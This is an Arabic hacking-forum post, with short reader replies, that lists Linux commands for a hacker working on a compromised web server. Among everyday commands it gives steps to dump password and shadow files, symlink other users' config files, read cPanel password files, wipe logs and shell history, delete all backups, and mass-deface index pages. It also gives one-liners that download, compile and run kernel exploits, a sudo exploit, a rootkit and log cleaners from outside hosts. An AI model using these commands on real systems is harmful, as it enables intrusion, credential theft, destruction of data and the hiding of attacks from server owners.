جميع اوامر ( Linux ) بسم الله الرحمن الرحيم اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه cat /etc/passwd | cut -d ":" -f1 1- أمر إظهار يوزرات المواقع : ls -la /etc/valiases او cat /etc/passwd او ls /var/mail او cat /etc/shadow او cat /etc/domainalias ln -s / etc/passwd w يسحب لك الملف بملف أسمه w rm angel.php <------لحذف ملف rm -r angel<------ لحذف مجلد find angel.php <------لعمل بحث عن ملف find *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد ----------------------------------------- أمر التأكد من صلاحية سحب الملفات علي السيرفر which xxxx <------ بدل العلامات بأمر السحب xxxx = أمر السحب اومر السحب wget curl -o get lynx -source ------------------------------------ هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد boot تقدر تغيير مجلد boot الى ---------------------------------------------- كود: cd /boot;ls -al etc << لفحص بعض الملفات ومنها قد تجد ثغرة confixx usr << لمعرفة برامج السيرفر opt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا -------------------------------------------- last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهم ps -ax : عرض الـ Processess lsmod : الـ modules الموجوده في الكيرنال uname -a : لعرض معلومات الكرنال اوامر بسيطه mv : تغيير الإسم cp : نسخ ملف cp -R : نسخ مجلد ln : إنشاء رابط ( link ) لملف gerp : البحث داخل ملف ----------------------------------- لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي : netstat -an|grep 11457 --------------------------------------------- امر للتاكد من وجود ملف كود: ls file حلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعض ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح كود: ls -al file ------------------------------------------------ أوامر إحترافيه : 1- إظهار اليوزرات بشكل مرتب : awk -F: '{ print $1 }' / etc/passwd | sort 2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي ) ps -o "%u : %U : %p : %a" 3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيس ps -eo pid,tt,user,fname,tmout,f,wchan 4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر ) ps -U user -u user -N 5- اليوزرز المتصلين الآن users 6- عرض آخر اليوزرز اللي دخلو : last 7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر ) finger user 8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم w 9- عرض البورتات المفتوحه netstat -lnp --ip ------------------------------------------- touch angel.php ينشئ لك ملف ضمن المجلد ++g : كومبيلر لل C++ و C gcc : كومبيلر لل C++ و C grep : يستخدم للبحث عن شئ داخل ملف gzip : لضغط ملفات gunzip : لضغط ملفات وال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unzip haltsys : لاغلاق النظام cat : لعرض محتوى اكثر من ملف مع بعض cd : لتغير الدليل الذي انت عليه chmod : لتغير تصريح دخلول ملف معين chown : لتغير مالك ملف معين clear : لمسح كل الذي على الشاشة cmp : لمقارنة ملفين cp : لنسخ الملفات crypt : لتشفير و فك تشفير الملفات csplit : لتقسيم الملف الى عدة ملفات cu : لطلب تريمنال يونكس اخر whoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxx rm : لمسح ملفات او مجلدات ( خاليه ) rmdir : لمسح مجلد ( خالي ) وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكس ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب : مثال rm --help -------------------------------------------------- أوامر رائعه : لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john ) find /home -user john لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم ) find $HOME -mtime 0 لمعرفة المساحه المستخدمه df -h لمعرفة المساحه المتبقيه du ----------------------------------------- وهذي مجموعة من الأوامر البسيطة ls -m يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات ls -t يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم ls -lu يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ) ls -F يظهر الملفات بأنواعها حيث : الملفات المسبوقة ب / عبارة عن مجلدات الملفات المسبوقة ب * عبارة عن ملفات تنفيذية الملفات المسبوقة ب @ عبارة عن روابط ls -S يظهر الملفات تسلسليا من الأكبر إلى الأصغر ls -X يظهر الملفات ويرتبها حسب امتدادها ls -r يظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....) cp لنسخ ملف أو مجلد mkdir لإنشاء مجلد mv لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته (مثلا mv angel gnom راح يعيد تسميت المجلد angel إلى gnom أو mv angel.php /ho me/hackteach/publi c_htm l/cc/test راح يحول الملف angel.php من المجلد إلي هو فيه إلى المجلد الجديد test) --------------------------------------- ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txt بالعربي ,, الأمر هذا هو حق السم لينك ,, symLink --------------------------------------- أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه : du -s / home | sort -rn ( بدون مسافه بعد / و home ) ----------------------------------- النسخ واللصق بهالطريقة c p /ho me/hi.t xt /ho me/jack أو العكس ---------------------------- لعمل ماس ديفاس بعد اخذ الروت كود PHP: find / -name "index.*" -exec cp /t mp/index.htm ---------------------------------------------- أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) : في أوامر كثيره .. بعضها : find / -name service.pwd او cat / home/*/public_html/_vti_pvt/service.pwd و cat / var/cpanel/accounting.log ( لاتنسى تحذف المسافات قبل var و home ) -------------------------------------------- 1- حذف ملفات اللوقو rm -rf / tmp/logs rm -rf $HISTFILE rm -rf / root/.ksh_history rm -rf / root/.bash_history rm -rf / root/.ksh_history rm -rf / root/.bash_logout rm -rf / usr/local/apache/logs rm -rf / usr/local/apache/log rm -rf / var/apache/logs rm -rf / var/apache/log rm -rf / var/run/utmp rm -rf / var/logs rm -rf / var/log rm -rf / var/adm rm -rf / etc/wtmp rm -rf / etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \; ------------------------------------------------- 2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن ) cat / dev/null > / var/log/kdebug cat / dev/null > / var/log/kernel cat / dev/null > / var/log/maillog cat / dev/null > / var/log/messages cat / dev/null > / var/log/secure cat / dev/null > / var/log/svclog cat / dev/null > / var/log/tcdebuglog cat / dev/null > / var/log/tclient cat / dev/null > / var/log/tivoLog.prv cat / dev/null > / var/log/tivoLog.pub cat / dev/null > / var/log/tivoweb.log cat / dev/null > / var/log/tvdebuglog cat / dev/null > / var/log/tverr cat / dev/null > / var/log/tvlog 3- أمر قرائة ملف الكونفيج على السيرفر cat / usr/local/apache/conf/httpd.conf 4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها ) find / -type f -perm -04000 -ls ------------------------------------------------- 5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها ) find / -type f -perm -02000 -ls 6- أوامر عرض المجلدات المصرح لها تصريح 777 find / -perm -2 -ls find / -type d -perm 0777 | xargs ls -alld find / -type d -pem -2 -ls 7- أمر حذف جميع الباك آب الموجوده على السيرفر find / -name "cpbackup*" -exec rm {} ; find / -name "backup*" -exec rm {} ; 8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي find / -name "index.*" -exec cp index.htm {} ; find / -name "default.*" -exec cp index.htm {} ; 9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر ) find / -name "index.*" -exec chown 99 index.html {} ; find / -name "default.*" -exec chown 99 index.html {} ; 10- أمر عرض System log cat / etc/syslog.conf 11- أمر عرض معلومات عن الذاكره cat / proc/meminfo 12- أمر تعديل دوال php والسيف مود وغيرها pico / usr/local/lib/php.ini 13- أمر عرض البورتات المفتوحه netstat -atup | grep IST 14- أمر عرض آخر إتصال lastlog 15- أمر عرض اليوزرات المتصله w -------------------------------------------------- 16- أمر لمعرفة إصدار الكيرنال dpkg --list | grep linux-image rpm -q kernel : kernel-2.6.18-53.1.4.el5 uname -s : SunOS uname -r : 2.6.22-14-EL5 uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64 cat / proc/version : Linux version 2.6.18-53.1.4.el5 ([email protected]) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 2007 17- أمر إيقاف process معين عن العمل kill -9 PID kill PID مع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمر ps ux ps aux top 18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها ) find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null 19- أمر عرض اليوزرات اللتي لا تحتوي على باسورد cut -d: -f1,2,3 / etc/passwd | grep --------------------------------------------------------------- 20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etc find / etc/ -type f -perm -o+w 2> / dev/null 21- أمر عرض أوامر السحب المفعله كـ wget which wget curl w3m lynx 22- أمر عرض معلومات عن المعالج CPUINFO cat / proc/version / proc/cpuinfo 23- أمر عرض مساحات الهاردسك du ( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه ) du -s / home/user | sort -rn df -Th 24- أمر التأكد من وجود المترجم gcc locate gcc 25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن ) wget No Results Found Packet Storm | gcc zap2.c -o zap2 | ./zap2 26- أمر تنفيذ بعض الهجمات على الكيرنال wget http://ftp.powernet.com.tr/supermail/debug/k3 | ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5 27- إستخدام ثغرة stack overflow عن طريق sudo wget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit 28- أمر تثبيت روت كت لإصدار 2.6 wget twofaced.org | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel 29- أمر استخدام سكربت Mig LogCleaner wget twofaced.org | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0 30- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يوم find / -mtime x ( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin ) 31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يوم find / -ctime x 32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذها find / -perm +4000 -user root 33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليها find / -perm +002 -user root 34- للبحث عن الملفات اللتي ليس لديها مالك find / -nouser 35- للبحث عن الملفات اللتي مالكها هو اليوزر root find / -user root 36- من الأوامر التفصيليه لـ find find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \; شرح الأمر : ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txt وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر root وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي يستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- ) ---------------------------------------- 37- وتستطيع إستخدام أمر find بشكل آخر .. مثل : find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \; شرح الأمر : عرض جميع الملفات فقط .. اللتي لديها خاصيتي SetUID و SetGID بشكل مفصل
مششكور يعطيك العافيهه
مشكور
مشكور عاشت ايدك
اخترقتك بس انت متعرف
مشكور موضوع رائع حبيبي و شرح كافي تسلم
مشكور للطرح واصل
لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك يوجد ايميلات ثلاثية للمبادلة
تسلم دام لنا عطائك
بسم الله الرحمن الرحيم ~. مشكور على الطرح ~.
قوانين المنتدى